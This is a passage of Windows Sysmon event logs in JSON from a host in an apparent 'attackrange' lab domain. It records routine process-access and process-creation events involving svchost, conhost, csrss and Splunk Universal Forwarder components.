C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7242,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7243,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7244,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.949\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-049A-5F25-0000-00100E6C0F00}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.949","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-049A-5F25-0000-00100E6C0F00}","TargetProcessId":"4836","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7245,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.090\r\nSourceProcessGUID: {A837DB8D-049A-5F25-0000-00100E6C0F00}\r\nSourceProcessId: 4836\r\nSourceThreadId: 2944\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.090","SourceProcessGUID":"{A837DB8D-049A-5F25-0000-00100E6C0F00}","SourceProcessId":"4836","SourceThreadId":"2944","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7246,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.622\r\nProcessGuid: {A837DB8D-049B-5F25-0000-0010D56D0F00}\r\nProcessId: 4268\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.622","ProcessGuid":"{A837DB8D-049B-5F25-0000-0010D56D0F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7247,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-049B-5F25-0000-0010D56D0F00}\r\nTargetProcessId: 4268\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-049B-5F25-0000-0010D56D0F00}","TargetProcessId":"4268","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7248,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049B-5F25-0000-0010D56D0F00}\r\nTargetProcessId: 4268\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049B-5F25-0000-0010D56D0F00}","TargetProcessId":"4268","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7249,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
